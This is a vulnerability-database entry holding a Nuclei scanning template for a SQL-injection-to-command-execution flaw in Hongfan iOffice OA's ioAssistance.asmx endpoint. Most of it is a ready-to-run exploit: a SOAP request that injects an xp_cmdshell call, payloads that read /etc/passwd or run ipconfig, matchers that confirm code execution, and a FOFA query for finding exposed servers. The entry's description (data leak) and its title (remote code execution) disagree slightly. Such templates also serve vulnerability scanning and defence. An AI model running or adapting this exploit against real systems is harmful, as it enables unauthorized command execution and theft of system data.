漏洞描述
There is a SQL injection vulnerability in Hongfan iOffice 10 Hospital Edition, which can be exploited by attackers to obtain sensitive database information.
hongfan-ioffice-rce: Hongfan OA ioAssistance.asmx - Remote Code Execution
PoC代码[已公开]
id: hongfan-ioffice-rce
info:
name: Hongfan OA ioAssistance.asmx - Remote Code Execution
author: SleepingBag945
severity: high
description: |
There is a SQL injection vulnerability in Hongfan iOffice 10 Hospital Edition, which can be exploited by attackers to obtain sensitive database information.
reference:
- https://github.com/FridaZhbk/pocscan/blob/main/%E7%BA%A2%E5%B8%86/oa%E7%BA%A2%E5%B8%86ioAssistance.asmx%E6%B3%A8%E5%85%A5RCE.py
metadata:
verified: true
max-request: 2
fofa-query: app="红帆-ioffice"
tags: hongfan,oa,sqli
http:
- raw:
- |
POST /ioffice/prg/set/wss/ioAssistance.asmx HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetLoginedEmpNoReadedInf xmlns="http://tempuri.org/">
<sql>exec master.dbo.xp_cmdshell '{{command}}'</sql>
</GetLoginedEmpNoReadedInf>
</soap:Body>
</soap:Envelope>
payloads:
command:
- '/bin/bash -c "cat /etc/passwd"'
- 'cmd /c ipconfig'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "Windows IP"
- "root:.*:0:0:"
condition: or
- type: word
part: header
words:
- "text/xml"
- type: status
status:
- 200
# digest: 4a0a004730450220117c053ecc26f3acb034cf85b42c958ec9be427715afba0a652fa88c4d3536db022100dff6c7b2f2f9a93cc61152ce147ed3905e3c59d7758462cff2b09673ee6087e7:922c64590222798bb761d5b6d8e72950